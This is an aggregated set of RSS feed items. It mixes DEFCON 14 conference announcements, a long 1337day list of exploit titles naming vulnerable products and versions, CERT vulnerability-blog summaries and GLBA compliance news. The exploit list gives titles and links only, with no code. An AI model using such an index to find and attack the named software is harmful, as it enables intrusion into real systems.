https://www.defcon.org/defconrss.xml Hey everyone, I want to make some announcements surrounding DEFCON 14. DEFCONDEFCONDEFCONDEFCON It's about that time to briefly lay down the inf0z, so here it goes. - Speakers have been selected, and are now listed on-line: http://www.defcon.org/html/defcon-14/dc-14-schedule.html They include an assistant Secretary of Defense, an FBI agent, Scary Hackers, privacy fanatics, security studs, and a hardware hacking ninja. - The con hotel is sold out, but overflow exists here: http://www.defcon.org/html/defcon-14/dc-14-hotel.html - Need a ride or got a room to spare? Check out the ride and room section of the DEF CON Forums https://forum.defcon.org/forumdisplay.php?f=26 - There are a lot of new contests, and some old ones that are no more (We'll miss you WiFi Shootout!) I'd mention them all, but it takes up too much space. To get a good grip on what is happening I'd suggest reading the contest area of the forums: https://forum.defcon.org/forumdisplay.php?f=102 - Black and White Ball is two nights this year, with some great bands and DJs including Regenerator, The Minibosses, DJ Jackalope, Catharsis and DJ Wintamute. - DEF CON 13 Audio and Video is now on-line for DOWNLOAD. Yep, you saw that right. We are phasing out the real media server and going to download mode. The audio is in .mp3, and the video is in H.264 2-pass 192k .mp4, optimized for the iPod video screen size. Right now you gotta subscribe to the rss feed, but the web site will soon sport the direct links. We hope to have DC-12 on-line in the next week. http://www.defcon.org/defconrss.xml Notes: This year we are at a new hotel, the Riviera. I did this because DEF CON was going to stagnate and die if it stayed at the Alexis Park any longer. The benefits of the new hotel are that the speaking rooms are larger, there is air conditioning, and we have room to grow. This year we get about 1/2 the space, and next year we should get 3/4 of the space. That extra room will allow us to offer break out classes, get togethers, and an additional track of speaking. Things we could only dream of before, but now are possible. It will take us all a year or two to learn what to do with all the space, but those are the kinds of problems I can live with. Did I mention the sky boxes? General hang out site: http://forum.defcon.org/ Remember DEF CON is what you make of it, and we have been lucky over the years to have a great group of people supporting us. The line up this year looks great, and the rest is up to us.

==> Crypto utopia Sealand ravaged by fire by Andrew Orlowski

https://www.defcon.org/defconrss.xml Andrew over at The Register writes about a fire that broke out on Sea Land wrecking the generator room. For those not familiar, there was a talk by Ryan Lacky of HavenCo, a company set up on Sea Land to provide privacy services. I believe it inspired some of the characters in Neil Stephenson's Cryptonomicon book (Go read it.. very good) I've wondered what happened since the business imploded in 2003, but from the article it seems not much. Fire has damaged a World War II gun emplacement seven miles off the English coast. Better known as "Sealand", the fort was acquired in the 1960s by Roy Bates, who declared it an independent principality." "In a presentation to the 2003 DefCon convention, a former employee described how internal politics and a lack of investment backing had thwarted the experiment. Contracts were broken, the bandwidth never materialised, and the location was vulnerable to DOS attacks. At the time [6] of his 2003 presentation, HavenCo had no new customers, and had seen several of its existing customers leave."

==> DEFCON 12 Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml We took the audio .wav files and encoded them into .mp3 files. We are working on DC-13 music next!

==> Cybersecurity contests go national by Robert Lemos

https://www.defcon.org/defconrss.xml I saw this over on SecurityFocus written by Rob Lemos, a long time Info Sec reporter with a solid reputation. It is a piece about how "Cybersecurity" events are going national. From Old old CTF games, to DEFCON, to the Cyber Defense Exercise (CDX) to the new CCDC it is all a progression of learning through different game challenges. It makes a couple brief mentions of DEFCON, but does not explain who or what we are. That's OK. If people really want to know, they'll find us.. From the article: "As the hackers came in, you could see (the students') reactions: They were frustrated when they saw the attackers breach their systems and excited when they stopped the attack," said John Carr, a mentor for the team fielded by Valley High School of West Des Moines and senior solutions consultant with Iowa-based technology consulting firm QCI."

==> DEFCON 13 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-13 encoded for download. This marks the first step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. DEFCON The second release is .mp3 audio files in a friendly CBR 64k format. As time goes on we will be re-encoding all previous conference content and releasing it! Next up DEFCON 13 DJ music and video..

==> Database giant and British hacker make amends.

https://www.defcon.org/defconrss.xml From By Robert McMillan at Computerworld some words about database security researcher and Oracle. DEFCON devotees may well recognize David's and Caesar's contributions to this space. Oracle once marketed its database as unbreakable, but security researcher David Litchfield has a less inflated opinion of the software. "God forbid that any of our critical national infrastructure runs on this product," he said recently on the widely read Bugtraq security mailing list. Oops it does.

==> Ride and Room sharing forum now open

https://www.defcon.org/defconrss.xml Going to DEFCON 13? Want to share a ride or a room? Got extra space in your car or room? Now is your chance to find others and make new friends. From TheCotMan's post about this: Suggestions: Your best bet in finding a ride, or room sharing is actually found by attending your local Defcon User Group, getting to know people in person, who then may give you space in their room. Trying to hook up with people on the Defcon Forums is a tricky thing. Generally, strangers won't offer other strangers space in their room. People will want some sort of references-- someone both parties know and trust to vouch for you. The Unofficial Defcon Faq http://defcon.stotan.org/faq/ was written by many, and assembled by HighWizard. It has some outdated information for when the convention was at the Alexis Park but also has some useful information about room sharing, and life at Defcon. Good luck.

==> DEFCON 13 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-13 encoded for download. This marks the first step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. The first release is .mp4 video files in an iPod friendly h.264 format. Soon to follow will be the .mp3 versions of all the same presentations. As time goes on we will be re-encoding all previous conference content and releasing it!

==> DEFCON 14 Speaker Selection now underway.

https://www.defcon.org/defconrss.xml The speaker selection process for DEFCON 14 is now underway, with early selections being made. While the CfP closes officially in two weeks, we are doing early selection to fill half the speaking spots now to speed things up. We will try very hard to have the process completed in two weeks, right at the end of the deadline. We'll be making announcements on-line as well as on forums and mailing lists. If you submitted a talk, look for acceptance or rejections over the next two weeks in your email. I am proud to say some of the submissions this year are of very high quality, and we should break in the Rivera with some killer content. As usual we are talking about the con over on the forum.defcon.org system.

==> www.defcon.org now serving compressed content!

https://www.defcon.org/defconrss.xml Well it has taken a bit of work to get the old web server happy with serving http 1.1 compressed content, but now that it is you should see a speed improvement in page views as well as availability. These changes are in preparation for the site and server change over, something that I hope will happen in the next week. If your browser supports content-encoding compressed, you should see a gain! Also note that forums.defcon.org is also enabling compression later this week after some testing. This is a good thing leading up to the convention because it is effectively like buying more bandwidth with a software upgrade.

==> Capture the Flag pre-qualification opens!

https://www.defcon.org/defconrss.xml From Kenshoto's announcement: Once again ... kenshoto will be running the Defcon Capture the Flag contest in 2006. This year's CtF will be a knock-down-drag-out-cyberninja war, the likes of which the world has never seen (except maybe last year). For the qualifying round, we've widened the scope from last year. With multiple challenges in various categories, there's something for every hacker, regardless of skillset (except running scripts and writing perl). The core skill for this contest will be finding vulnerabilities in software. Those of you who have avoided playing in CtF because you think it is for lamers, we bet you can't find all our vulnerabilities. Teams will still need to defend a server, and will need to be able to exploit the vulnerabilities they find. As last year, the vulnerabilities will be 100%-custom, so leave your nessus, metasploit and core impact bleep at home. There will be a qualifying round, which will start on Friday, June 9th at 10:00 PM EDT. Only 8 teams will qualify. Last year's winners,Shellphish, are automatically qualified (leaving 7 team slots), unless they too decide to play in the qualifying round, in which case they will still need to place in the top 8. Registration is currently open at http://kenshoto.com/quals/ We encourage anyone (even individuals) to attempt to qualify, even if as a learning experience. We intend quals to be enjoyable for everyone,regardless of your plans for Defcon. Challenges will range wildlyin difficulty from Mitnick to Eagle we've got it all. Good luck... you're going to need it. -kenshoto

==> DEFCON 14 CfP Closes at the end of the month!

https://www.defcon.org/defconrss.xml The Call for Papers for DEFCON 14 is closing soon. June 15th is the cut off date, but we will start making early speaking selections in the next two weeks.

==> Most lengthy DC trip report, ever. (warning, pdf)

https://www.defcon.org/defconrss.xml Want to get a groups perspective of DC13? While this 133 page .pdf is largely copied from various speeches, there are some pretty pictures, and the various contributors to the report did a good job. It must have been some work to put together. Check it out, and if you know of other reports like this one, please let us know.

==> DEFCON 14 Beta FAQ v0.95 Now Available!

https://www.defcon.org/defconrss.xml An update to the official FAQ talking about DEFCON and DEFCON 14. Questions and Answers about the new hotel location, costs, events, resources and more. The next update will include a split into two FAQs. One for general DEFCON questions, and one for DEFCON 14.

==> DEFCON places below pumpkin hurling contest!

https://www.defcon.org/defconrss.xml Who hails DEFCON as a noncommercial event, calls its attendees 'digital cognoscenti', throws in a oblique Linus bleep quote, and places DC as the 8th best north American geek fest? Follow the link to find out!

==> DEFCON 14 Call for Papers Open!

https://www.defcon.org/defconrss.xml We are opening the call for papers for DEFCON 14 - the annual gathering of subversive computer folks. Earlier submissions are given higher priority, so prepare your best kung-foo, and send it our way. Remember, we are always looking for original and highly technical content, unusual subject matters, software releases, innovative hardware hacking, and generally mind-blowing content. Check out past convention archives to get an idea of what we are talking about.

==> Getting a job as a Pen-Tester, DEFCON style

https://www.defcon.org/defconrss.xml If you thought being a pen-tester required knowledge, skill, and professionalism, Dmitri sets the record straight. His step-by-step tutorial will teach you how to write incoherent emails, slap imposing stickers on your notebook, and mumble with enough techno-bleep to become a world-renowned pen-tester at a big-name firm. Check out Dmitri's blog for the full article.

==> Trends of 2006 - Stealth Rootkit techniques as introduced at DC13 by Sherri Sparks and Jamie Butler

https://www.defcon.org/defconrss.xml Dennis Moreau, CTO of Configuresoft Inc, discusses security trends likely to appear in the coming year. In addition to discussing the limitations to black-list based security technologies, he highlights a dramatic DEFCON 13 speech. Sherri Sparks and Jamie Butler presented "Shadow-Walker" Raising The Bar For Rootkit Detection.

==> Global Capture the Flag comes to the classrooms worldwide

https://www.defcon.org/defconrss.xml 22 student teams from 18 universities on four continents competed in the largest Capture the Flag event ever attempted. Inspired by DEFCON's CTF and organized by DEFCON CTF winner Professor Vigna, the CTF event differed from DEFCON's contest in by not limiting the amount of teams and having international participation. Vigna's page describes his contest in enough detail to allow others to set up their own contests.

==> Renderman to the rescue!

https://www.defcon.org/defconrss.xml Renderman, winner of various contests at DEFCON is written about in this article. "A Las Vegas magazine once described Renderman as "infamous,'' which he admits was flattering. He's only famous to other hackers."

==> DEFCON Staff, Speakers release new book "OS X for Hackers at Heart"

https://www.defcon.org/defconrss.xml Longtime DEFCON staffer Chris Hurley collaborates with DEFCON Speakers Bruce Potter, Johnny Long, and Ken Caruso to produce "OS X for Hackers at Heart."

==> DEFCON.ORG now SSL enabled!

https://www.defcon.org/defconrss.xml DEFCON.ORG is now SSLorized for your enhanced privacy and crypto happiness. Also SSL enabled for more private discussions - forum.defcon.org.

==> DEFCON 13 Write-up in the current issue of Blacklisted! 411

https://www.defcon.org/defconrss.xml The fall 2005 issue of Blacklisted! 411 has an extensive six page write-up of DEFCON that's worth reading. If you've never read Blacklisted, you should - it's a worthy mag.

==> DEFCON 14 Beta FAQ v0.91 Now Available!

https://www.defcon.org/defconrss.xml The first official FAQ talking about DEFCON, and DEFCON 14. Questions and Answers about the new hotel location, costs, events, resources and more. Please check it out and provide feedback so we can get a really solid v 1.0 FAQ out by the end of the year!

==> HP fires real bullet at Storageworks array

https://www.defcon.org/defconrss.xml <P>Charlie Demerjian over at the Inquirer has a piece about HP shooting a .308 bullet at an XP12000 storage array, and the array still functioning. I have questions about where the bullet actually went, I mean if it smashed all the controller cards or went through the power supplies it wouldn't still function. But hey! They got it just right. The best part, though, is the end.</P> <P>'The XP12000 was then brought back to a fully functional state without any loss of uptime. Not bad at all. As far as I know, this is the only test of it's type, but I am sure we could arrange something similar at DefCon if Sun wants to loan us a 15K.'</P>

==> DNS and Site Updates

https://www.defcon.org/defconrss.xml As DEFCON 14 gets closer, I plan on making some major network changes to better support the convention. I plan on moving the web site, forum, and store to new servers and ip addresses in the next month. Shortly after that I will be upgrading the media server and starting to release past conference archives for download. That is right, you read it here! No more real media streaming, soon you will be able to D/L the files directly in h.264 (Video iPod compatible) format. So this is just a heads up that things will be switching around over the next month or so.

==> remote - Java Web Start Double Quote Injection Remote Code Execution

http://www.1337day.com/rss

==> web - Wordpress WP-SendSMS Plugin 1.0 - Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Weathermap 0.97c (editor.php, mapname param) - Local File Inclusion

http://www.1337day.com/rss

==> dos / - Cisco ASA < 8.4.4.6|8.2.5.32 Ethernet Information Leak

http://www.1337day.com/rss

==> web - Resin Application Server 4.0.36 XSS / Source Code Disclosure

http://www.1337day.com/rss

==> remote - MobileIron Virtual Smartphone Platform Privilege Escalation Exploit

http://www.1337day.com/rss

==> web - ZPanel 10.0.0.2 Remote Command Execution Vulnerability

http://www.1337day.com/rss

==> remote - Exim and Dovecot Insecure Configuration Command Injection

http://www.1337day.com/rss

==> remote - Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow

http://www.1337day.com/rss

==> web - Buffalo WZR-HP-G300NH2 Cross Site Request Forgery Vulnerability

http://www.1337day.com/rss

==> remote - Java Applet Driver Manager Privileged toString() Remote Code Execution

http://www.1337day.com/rss

==> remote - Sun Java Web Start Double Quote Injection Vulnerability

http://www.1337day.com/rss

==> web - NanoBB 0.7 Cross Site Scripting / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> dos / - Quick TFTP Server 2.2 - Denial of Service

http://www.1337day.com/rss

==> web - Asus RT56U 3.0.0.4.360 - Remote Command Injection

http://www.1337day.com/rss

==> web - Napata CMS 1.5.2013 PHP Code Injection Vulnerability

http://www.1337day.com/rss

==> web - JBoss AS Administrative Console Password Disclosure

http://www.1337day.com/rss

==> remote - Novell Zenworks Mobile Device Management Local File Inclusion

http://www.1337day.com/rss

==> web - RuubikCMS 1.1.1 - Path Traversal Vulnerability

http://www.1337day.com/rss

==> remote - Exim sender_address Parameter - RCE Exploit

http://www.1337day.com/rss

==> remote - Plesk Apache Zeroday Remote Exploit

http://www.1337day.com/rss

==> remote - Xpient Cash Drawer Operation Vulnerability

http://www.1337day.com/rss

==> web - Cuppa CMS Remote / Local File Inclusion Vulnerability

http://www.1337day.com/rss

==> web - gpEasy CMS 4.0 Shell Upload Vulnertability

http://www.1337day.com/rss

==> dos / - Mac OSX Server DirectoryService Buffer Overflow

http://www.1337day.com/rss

==> remote - MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution

http://www.1337day.com/rss

==> web - CMS Gratis Indonesia PHP Code Injection Vulnerability

http://www.1337day.com/rss

==> remote - Imperva SecureSphere Operations Manager Command Execution Vulnerability

http://www.1337day.com/rss

==> remote - DS3 Authentication Server Command Execution Vulnerability

http://www.1337day.com/rss

==> web - Seowonintech Routers Remote Root File Dumper

http://www.1337day.com/rss

==> web - Netgear DGN1000 / DGN2200 Authentication Bypass / Command Execution

http://www.1337day.com/rss

==> web - Netgear WPN824v3 Unauthorized Config Download

http://www.1337day.com/rss

==> dos / - LogMeIn Hamachi <= 2.1.0.362 Remote DOS

http://www.1337day.com/rss

==> web - Umbraco CMS 4.x Arbitrary aspx File Upload Vulnerability

http://www.1337day.com/rss

==> web - PHD Help Desk 2.12 - SQL Injection Vulnerability

http://www.1337day.com/rss

==> local - Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit

http://www.1337day.com/rss

==> web - PhpTax 0.8 Code Execution Vulnerability

http://www.1337day.com/rss

==> web - PHP4DVD 2.0 Code Injection Vulnerability

http://www.1337day.com/rss

==> web - Elastix 2.4.0 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - HtmlCommentBox Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> remote - Apache Struts includeParams Remote Code Execution

http://www.1337day.com/rss

==> web - MyBB Ajax Chat SQL Vulnerability

http://www.1337day.com/rss

==> remote - Oracle WebCenter Content CheckOutAndOpen.dll ActiveX RCE

http://www.1337day.com/rss

==> local - BOINC Manager (SETI at Home) version 7.0.64 Field stack based BOF

http://www.1337day.com/rss

==> dos / - ModSecurity Remote Null Pointer Dereference Vulnerability

http://www.1337day.com/rss

==> remote - Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow Vulnerability

http://www.1337day.com/rss

==> local - Zyxel NBG5715 Local admin privileges bypass Vulnerability

http://www.1337day.com/rss

==> dos / - Monkey HTTPD 1.1.1 - Crash PoC

http://www.1337day.com/rss

==> remote - Logic Print 2013 - Stack Overflow (vTable Overwrite)

http://www.1337day.com/rss

==> remote - Intrasrv Simple Web Server 1.0 SEH based Remote Code Execution BOF

http://www.1337day.com/rss

==> web - WordPress User Role Editor 3.12 Cross Site Request Forgery

http://www.1337day.com/rss

==> web - DIF Log Search Widget 1.0e Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> web - Zavio IP Camera Command Injection / Bypass Vulnerabilities

http://www.1337day.com/rss

==> remote - IBM SPSS SamplePower C1Tab ActiveX Heap Overflow Vulnerability

http://www.1337day.com/rss

==> web - MayGion IP Camera Path Traversal / Buffer Overflow

http://www.1337day.com/rss

==> web - TP-Link IP Camera Hardcoded Credentials / Command Injection

http://www.1337day.com/rss

==> dos / - CodeBlocks 12.11 (Mac OS X) - Crash POC

http://www.1337day.com/rss

==> web - TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit

http://www.1337day.com/rss

==> web - YeaLink IP Phone Firmware <=9.70.0.100 Unauthenticated Phone Call Vulnerability

http://www.1337day.com/rss

==> local - AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

http://www.1337day.com/rss

==> remote - PEStudio 3.69 - Denial of Service

http://www.1337day.com/rss

==> remote - CompatUI ActiveX Control <= Remote Command Execution

http://www.1337day.com/rss

==> web - HP LaserJet Pro P1606dn - Webadmin Password Reset

http://www.1337day.com/rss

==> web - Vanilla Forums 2.0.18.8 - Insecure Permissions / XSS Vulnerabilities

http://www.1337day.com/rss

==> web - Wordpress User Role Editor Plugin 3.12 - CSRF Vulnerability

http://www.1337day.com/rss

==> dos / - SIEMENS Solid Edge ST4 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE

http://www.1337day.com/rss

==> remote - SIEMENS Solid Edge ST4 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE

http://www.1337day.com/rss

==> web - XOOPS 2.5.6 CSRF Vulnerability

http://www.1337day.com/rss

==> web - MyMarket 1.72 bypass admin login & product_details blind sqli

http://www.1337day.com/rss

==> local - Show In Browser 0.0.3 Ruby Gem File Injection Vulnerability

http://www.1337day.com/rss

==> dos / - SAS Integration Technologies Client 9.31_M1 Buffer Overflow

http://www.1337day.com/rss

==> web - PHP-fusion v7.02.06 XSRF/CSRF vulnerability

http://www.1337day.com/rss

==> web - Kimai 0.9.2.1306-3 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Spider Catalog 1.4.6 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Spider Event Calendar 1.3.0 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Matterdaddy Market 1.4.2 CSRF / Arbitrary File Upload

http://www.1337day.com/rss

==> web - AVE.CMS 2.09 Blind SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - IBM WebSphere DataPower 3.8.2 / 4.0.x / 5.0 Cross Site Scripting

http://www.1337day.com/rss

==> remote - AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass

http://www.1337day.com/rss

==> remote - Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow

http://www.1337day.com/rss

==> local - Ophcrack v3.5.0 - Local Code Execution BOF

http://www.1337day.com/rss

==> remote - MS Internet Explorer & MSN Explorer Arbitrary File Overwrite

http://www.1337day.com/rss

==> dos / - win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase

http://www.1337day.com/rss

==> remote - Linksys WRT160nv2 apply.cgi Remote Command Injection

http://www.1337day.com/rss

==> remote - D-Link DIR615h OS Command Injection Vulnerability

http://www.1337day.com/rss

==> web - iOS < 5.0 Free Apps/Music Bug

http://www.1337day.com/rss

==> web - Haraj Script Stored XSS and File Upload Vulnerability

http://www.1337day.com/rss

==> web - Dsl Router D-link BZ_1.06 Multiple Vulnerabilities

http://www.1337day.com/rss

==> local - Glibc 2.11.3 / 2.12.x LD_AUDIT libmemusage.so Local Root Exploit

http://www.1337day.com/rss

==> web - Moa Gallery 1.2.6 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - ZPanel Crafted Template Remote Command Execution Vulnerability

http://www.1337day.com/rss

==> dos / - nginx 1.3.9-1.4.0 DoS PoC

http://www.1337day.com/rss

==> web - CKEditor < 4.1 Drupal 6.x & 7.x - Persistent XSS Vulnerability

http://www.1337day.com/rss

==> web - Wordpress hd-player 0day Exploit

http://www.1337day.com/rss

==> web - Exponent CMS 2.2.0 Beta 3 LFI / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> remote - SSH User Code Execution Vulnerability

http://www.1337day.com/rss

==> remote - Mutiny 5 Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - Wordpress Newsletter 3.2.6 Cross Site Scripting Vulnerability

http://www.1337day.com/rss

==> local - Kloxo 6.1.12 Privilege Escalation Vulnerability

http://www.1337day.com/rss

==> Keep Calm and Deploy EMET

http://www.cert.org/blogs/vuls/rss.xml CVE-2013-1347, the Internet Explorer 8 CGenericElement object use-after-free vulnerability has gotten a lot of press lately because it was used in a "watering hole" attack against several sites.

==> Don't Sign that Applet!

http://www.cert.org/blogs/vuls/rss.xml Hi, it's Will. I've recently been looking into the state of signed Java applet security. This investigation was triggered by the Oracle blog post IMP: Your Java Applets and Web Start Applications Should Be Signed, which as the title implies, suggests that all Java developers sign their applets, regardless of the privileges required. In this blog entry, I explain why this practice is a bad idea.

==> Finding Patterns of Malicious Use in Bulk Registrations

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Leigh Metcalf with my colleague Jonathan Spring. In 2011, .co.cc [1] and .co.tv [2] were removed from Google’s search results because of the high incidence of malicious domains (.cc is the TLD for the Cocos Islands and .tv is the TLD for Tuvalu). Neither of these domains is an official TLD of its respective country of origin, but is a zone in which the owner happens to make single subdomains freely available and charge a nominal fee for bulk registrations. Similarly, an APWG report for the second half 2011 lists .tk, the TLD of the island of Tokulu, as the most common TLD used in phishing attacks. It also permits free domain registration.

==> GeoIP in Your SOC (Security Operations Center)

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Vijay Sarvepalli, Security Solutions Engineer in the CERT Program. Today, whether you’re shopping for a new house or trying to find a babysitter, you end up using Google maps or a similar service to assist your decision making. In this blog post, I discuss GeoIP capabilities that can be built into your SOC to provide a spatial view of your network threats and how this view can help your network situational awareness.

==> Second Level Domain Usage in 2012 for Common Top Level Domains

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Leigh Metcalf with my colleague Jonathan Spring. Here is a look at second level domain (SLD) usage in 2012 for the most common generic Top Level Domains (gTLDs): biz, com, info, mobi, net, and org. We used two data sources: (1)the master zone files (RFC 1035 sec. 5) and (2) the SIE (http://sie.isc.org), a passive DNS data source. From these sources we examined three features of global gTLD usage—the number registered, the number active, and the ratio.

==> The Growth of IPv6 Announcements

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Leigh Metcalf again with my colleague Rhiannon Weaver. IPv6, the replacement for IPv4, has been heavily marketed. To consider exactly how popular IPv6 is on the internet, one method is to examine the number of autonomous systems (ASes) that announce IPv6.

==> An Alternate View of Announced IPv4 Space

http://www.cert.org/blogs/vuls/rss.xml In my previous post, I examined the total amount of IPv4 space announced and presented cumulative graphics. While this view is useful in determining how much IPv4 space is announced, it doesn’t say much about which IPv4 space is announced. The graphic in Figure 1 is an alternate visualization of the data from that post and is called the Internet barcode.

==> The Growth Rate of IP Addresses That Are Advertised as Usable on the Internet

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Leigh Metcalf of the Network Situational Awareness Team. Recently, I have been considering the amount of IPv4 space that is announced on the Internet. All blocks have been allocated, but how many are actually being used? To investigate this, I examined the routing tables to determine which networks were announced on the internet as usable from January 1, 2009 through December 31, 2012.

==> Watching Domains That Change DNS Servers Frequently

http://www.cert.org/blogs/vuls/rss.xml Hello, this is Leigh Metcalf of the CERT Network Situational Awareness (NetSA) Team. Timur Snoke and I have discovered some interesting results in our continuing examination of the public Domain Name System (DNS). Our work has been focusing on domains that change their name servers frequently.

==> Anatomy of Java Exploits

http://www.cert.org/blogs/vuls/rss.xml On behalf of the real author, my colleague David Svoboda (and a couple others who work on the CERT Secure Coding Initiative), here's a post analyzing recent Java exploits. Java was exploited recently and last August. The August exploit was patched by Oracle on August 30; this most recent exploit now also has a patch available. Strictly speaking, the vulnerabilities that permitted both exploits are independent; the current exploit attacked code that was unused by the August exploit. Nevertheless, these vulnerabilities were quite similar. This blog post examines the vulnerabilities that permitted Java to be exploited in each case, using the proof-of-concept code exploits that have been published for them in January 2013 and August 2012.

==> Java in Web Browser: Disable Now!

http://www.cert.org/blogs/vuls/rss.xml Hi, it's Will and Art here. We've been telling people to disable Java for years. In fact, the first version of the Securing Your Web Browser document from 2006 provided clear recommendations for disabling Java in web browsers. However, after investigating the Java 7 vulnerability from August, I realized that completely disabling Java in web browsers is not as simple as it should be. Luckily, Oracle has since added a new option in the Java control panel applet to disable Java in the browser. If you haven't already done so, now is the time to disable Java in the browser.

==> Forking and Joining Python Coroutines to Collect Coverage Data

http://www.cert.org/blogs/vuls/rss.xml In this post I'll explain how to expand on David Beazley's cobroadcast pattern by adding a join capability that can bring multiple forked coroutine paths back together. I'll apply this technique to create a modular Python script that uses gcov, readelf, and other common unix command line utilities to gather code coverage information for an application that is being tested. Along the way I'll use ImageMagick under Ubuntu 12.04 as a running example.

==> A Look Inside CERT Fuzzing Tools

http://www.cert.org/blogs/vuls/rss.xml Hi, this is Allen Householder of the CERT Vulnerability Analysis team. If you've been following this blog for a while, you are probably familiar with our fuzzing tools: Dranzer, the CERT Basic Fuzzing Framework (BFF), and the CERT Failure Observation Engine (FOE). While creating tools that can find and analyze vulnerabilities makes up a significant portion of our work in the CERT Vulnerability Analysis team, our focus is on developing and communicating the knowledge we've built into those systems. To that end, we recently published a pair of reports that describe a few of the heuristics and algorithms implemented in the BFF and FOE fuzzing tools. We briefly mentioned these techniques in the release announcements for the tools, but did not describe how they work in detail. Abstracts and links to the reports can be found below.

==> Updates to CERT Fuzzing Tools (BFF 2.6 & FOE 2.0.1)

http://www.cert.org/blogs/vuls/rss.xml Hi everybody. Allen Householder from the CERT Vulnerability Analysis team here, back with another installment of "What's new in CERT's fuzzing frameworks?" Today we're announcing the release of updates of both our fuzzing tools, the CERT Basic Fuzzing Framework (BFF) version 2.6 and the CERT Failure Observation Engine (FOE) version 2.0.1. The remainder of this post describes the changes in more detail.

==> Detecting Abnormal Technology Systems Behavior

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Upgraded Version of WebSearch Launched by DocuLex

http://www.compliancehome.com/rss/resources-GLBA.xml WebSearch version 4.2 that boasts of additional features like customized business process and collaborative workflow capability has been introduced by DocuLex, Content management software provider. WebSearch version 4.2 is a product of DocuLex Archive Studio that helps organizations with decision making power via automation of any business process through the benefit of systematic workflow.

==> Model Consumer Privacy Notice Online Form Builder Released by Federal Regulators

http://www.compliancehome.com/rss/resources-GLBA.xml An Online Form Builder that financial institutions can download and use to develop and print customized versions of a model consumer privacy notice is released by eight federal regulators, including the Federal Reserve Board and the Federal Trade Commission. The form builder, based on the model form regulation published in the Federal Register on Dec. 1, 2009, under the Gramm-Leach-Bliley Act (GLBA), is available with several options. The form builder will guide an institution to select the version of the model form that fits its practices, such as whether the institution provides an opt-out for consumers.

==> ACA-Supported Gramm-Leach-Bliley Reforms Passed by U.S. House

http://www.compliancehome.com/rss/resources-GLBA.xml The U.S. House of Representatives passed H.R. 3506 by voice vote on the Suspension Calendar, creating a positive policy step forward for our industry on on April 14, 2010. H.R. 3506, which was sponsored by Representatives Erik Paulsen (R-MN) and Dennis Moore (D-KS), removes burdensome requirements under the Gramm-Leach-Bliley Act (GLBA).

==> An Advisers msut know the ways to protect clients' privacy

http://www.compliancehome.com/rss/resources-GLBA.xml As more and more personal financial information is transmitted online and stored electronically, concerns about privacy and data protection have grown. For financial advisers, privacy issues will only become more important as technology and new types of media proliferate.

==> Reasons Why the U.S. Wont Be Prepared For Cyberwar by Rockefeller-Snowe's Regulations

http://www.compliancehome.com/rss/resources-GLBA.xml Sens. Jay Rockefeller (D-W. Va.) and Olympia Snowe (R-Maine) have formulated a new cybersecurity bill that they described in Fridays Wall Street Journal. (Use Google news to get to the full article.) The bill as proposed will be very disruptive to the operations of every business and will do essentially nothing to prepare the U.S. for cyberwar.

==> GLBA Privacy Notices At Last Get Overhauled

http://www.compliancehome.com/rss/resources-GLBA.xml On November 17, 2009, the Federal Trade Commission (FTC), along with other federal regulators (Federal Deposit Insurance Corporation, Federal Reserve Board, Office of the Comptroller of the Currency, Office of Thrift Supervision, National Credit Union Administration, Commodity Futures Trading Commission, and Securities and Exchange Commission, collectively referred to as Agencies) adopted final Model Privacy Notice forms for compliance with the Gramm-Leach Bliley Act (GLBA) and its implementing regulation, the FTCs Financial Privacy Rule. The Model Privacy Notice replaces the Sample Clauses, which appear in Appendix B to the Privacy Rule and, as such, now provide the safe harbor for compliance.

==> Cloud Computing Backup? Significant Questions

http://www.compliancehome.com/rss/resources-GLBA.xml The quick evolution and maturity of cloud storage providers creates a new opportunity for managed service providers to offer cloud backup services. Backup to the cloud can provide a compelling cost advantage for SMB and SME customers and it opens up a new model for VARs and MSPs to profit with cloud-based backup services.

==> Effective Workflow for Fixing Network Vulnerabilities & Policy Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml This webcast Abstracts the 8 workflow processes that create an effective vulnerability management solution to ensure security and document compliance. Discover how the right software-as-a-service (SaaS) solution automates these processes for fast, cost-effective remediation and policy compliance. View this webcast and learn about and effective remediation plan that provides continuous protection from network vulnerabilities and helps comply with regulations such as PCI, GLBA and HIPAA

==> New Degausser Introduced by SEM

